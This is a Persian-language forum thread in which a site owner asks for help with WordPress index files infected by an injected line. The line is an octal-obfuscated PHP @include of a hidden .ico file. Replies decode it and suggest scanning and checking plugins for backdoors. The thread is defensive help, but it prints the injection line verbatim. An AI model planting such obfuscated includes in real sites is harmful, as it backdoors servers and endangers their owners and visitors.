سوال و راهنمایی در مورد فایل های ویروسی وب سایت وردپرسی
یه سایتی هست که تقریبا تمام فایل های ایندکس اون اولش یه همچین کدهایی اضافه شده .
کد PHP:
/*658df*/
@include "\057h\157m\145/\152e\146t\150e\165j\057p\165b\154i\143_\150t\155l\0154o\143k\163/\166e\162s\145/\056b\0718\1445\1460\060.\151c\157";
/*658df*/
دوستان و بزرگواران در این زمینه تجربه یا اطلاعی دارن؟
پاسخ : سوال و راهنمایی در مورد فایل های ویروسی وب سایت وردپرسی
انکود شده Hex
خروجی دیکد شده این کد شما :
کد:
/home/jeftheuj/public_html
4ocks/verse/.b98d5f00.ico
اما اینکه چرا در همه فایلها هست، نیاز به بررسی داره که خودتون میتونید انجام بدید.
این ترکیبی از کاراکترهای استاندارد و ASCII اکتال هست. که مثلا شماره 057 که داخل کد شما هست، نمایانگر اسلش / هست و 157 نمایانگر حرف O
اطلاعات در خصوص Regex تو PHP ( لینک )
سایت روی هاست اشتراکی هست یا سرور اختصاصی و مجازی و ...؟
اگر دسترسی روت دارید، یکسری از توابع PHP رو باید غیرفعال کنید.
یه اسکن هم لازم هست در کل.
اگر که سایت وردپرس هست، نیاز دارید پلاگینها رو چک کنید و ببینید پلاگین یا پوستهای بک دور داره یا نه.
پاسخ : سوال و راهنمایی در مورد فایل های ویروسی وب سایت وردپرسی
نقل قول:
نوشته اصلی توسط
sam_pontiac
انکود شده Hex
خروجی دیکد شده این کد شما :
کد:
/home/jeftheuj/public_html
4ocks/verse/.b98d5f00.ico
اما اینکه چرا در همه فایلها هست، نیاز به بررسی داره که خودتون میتونید انجام بدید.
این ترکیبی از کاراکترهای استاندارد و ASCII اکتال هست. که مثلا شماره 057 که داخل کد شما هست، نمایانگر اسلش / هست و 157 نمایانگر حرف O
اطلاعات در خصوص Regex تو PHP (
لینک )
سایت روی هاست اشتراکی هست یا سرور اختصاصی و مجازی و ...؟
اگر دسترسی روت دارید، یکسری از توابع PHP رو باید غیرفعال کنید.
یه اسکن هم لازم هست در کل.
اگر که سایت وردپرس هست، نیاز دارید پلاگینها رو چک کنید و ببینید پلاگین یا پوستهای بک دور داره یا نه.
ممنون و سپاسگزارم بابت راهنمایی تون .
بله دسترسی هاست دارم .
نقل قول:
اگر دسترسی روت دارید، یکسری از توابع PHP رو باید غیرفعال کنید.
دقیقا چه توابعی رو باید غیرفعال کنم ؟
نقل قول:
یه اسکن هم لازم هست در کل.
دقیقا با چی باید اسکن کنم ؟
نقل قول:
نیاز دارید پلاگینها رو چک کنید و ببینید پلاگین یا پوستهای بک دور داره یا نه.
چطور میشه این مورد رو تشخیص داد که بک دور داره یا نه ؟
پاسخ : سوال و راهنمایی در مورد فایل های ویروسی وب سایت وردپرسی
سلام
یه سری از سایت ها هستند که اسکن قالب و پلاگین ها رو برای ویروسی بودنشون انجام میدن.
آیا میشه به اون سایتا اعتماد کرد و این جور کد ها رو هم برسی میکنن؟